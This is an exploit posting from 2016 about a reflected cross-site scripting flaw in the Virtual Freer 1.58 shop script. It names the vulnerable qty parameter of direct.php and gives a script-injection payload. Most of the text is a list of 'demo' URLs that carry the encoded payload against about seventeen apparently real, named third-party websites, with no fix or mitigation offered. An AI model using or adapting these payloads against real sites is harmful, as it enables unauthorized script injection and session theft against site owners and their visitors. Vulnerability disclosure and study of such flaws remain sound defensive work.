Virtual Freer 1.58 Cross Site Scripting
Posted on 05 April 2016
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title: Virtual Freer Reflected Cross Site Scripting [+] [+] Exploit Author: Milad Hacking [+] [+] Discovered By: Milad Hacking [+] [+] Vendor Homepage : http://freer.ir/virtual/ [+] [+] Date: 2016-03-01 [+] [+] Tested on: Kali Linux / lceweasel [+] [+] Software link : http://freer.ir/virtual/download.php?action=get [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Screenshot : http://up.ashiyane.org/images/sg53t4duy1n2g5xnfwm5.png [+] Location : site.com/direct.php?card=[cartid]&qty=1"><script>alert(/xss testing/)</script> [+] Demo : http://shop.azcam-ultra.ir/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://usaid.ir/Foroshgah/direct.php?card=21&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://inet2.ir/direct.php?card=12&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://pay-me.ir/direct.php?card=5&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://pingbaz.ir/shop/direct.php?card=1&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://tx149.ir/shop/direct.php?card=7&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://shop.mihannod.ir/direct.php?card=7&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://store.parseset.ir/direct.php?card=3&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://tx166.ir/shop/direct.php?card=25&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://instaliker.ir/store/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://support-sara.tk/pay/direct.php?card=22&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E https://mokhaberat.net/factor/direct.php?card=1&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://pinguin.ir/direct.php?card=12&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://www.pay-ment.ir/direct.php?card=2&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://vip.irantournament.ir/direct.php?card=44&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://anaz.ir/mellat2/direct.php?card=44&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E http://shoping.hanakala.ir/direct.php?card=24&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E Ya FaTeme Zahra [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi - irhblackhat - Distr0watch - N3TC4T - Ac!D - Mr.G}{o$t - MRS4JJ4D - Nazila Blackhat - Bl4ck_MohajeM - Ehsan Hosseini - Ali Inject0r - Peyman C4t And All Ashiyane Digital Security Team [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] Greetz to: My Lord Allah https://telegram.me/thehacking http://upbash.ir milad.hacking.blackhat@Gmail.com [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]